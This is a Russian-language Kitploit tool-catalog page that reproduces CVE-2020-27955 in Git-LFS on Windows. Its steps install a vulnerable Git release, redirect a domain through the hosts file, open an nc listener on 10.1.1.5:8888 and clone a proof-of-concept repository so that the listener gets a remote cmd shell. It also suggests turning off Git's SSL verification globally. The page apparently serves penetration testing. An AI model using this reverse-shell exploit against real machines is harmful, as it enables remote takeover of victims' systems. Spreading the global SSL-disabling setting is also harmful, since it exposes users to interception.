Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-27955 | Kitploit
Инструменты/GitHubGitHub/z50913/cve-2020-27955
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЛатеральное перемещениеТестирование на ПроникновениеКомандование и Управление
GitHubz50913/cve-2020-27955

CVE-2020-27955

Репозиторий
3 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Воспроизведение уязвимости CVE-2020-27955

1、На машине с Windows скачайте уязвимую версию Git-LFS

Ссылка для загрузки: https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1

2、На машине с Windows установите и добавьте в файл hosts следующую запись: 10.1.1.5 — это хост, на котором nc прослушивает порт 8888 (можно заменить на свой)

10.1.1.5 abcall.xyz

3、На хосте 10.1.1.5 запустите nc для прослушивания порта 8888

┌──(root㉿hostname)-[~]

└─# nc

Cmd line: -l -p 8888

4、На машине с Windows введите в командной строке cmd

git clone https://github.com/z50913/CVE-2020-27955.git

5、10.1.1.5 получает shell cmd машины с Windows

#Прочее

Если возникает ошибка SSL-сертификата, можно сначала выполнить следующую команду, чтобы отключить проверку SSL, а затем заново выполнить clone

git config --global http.sslverify false

Скачать инструмент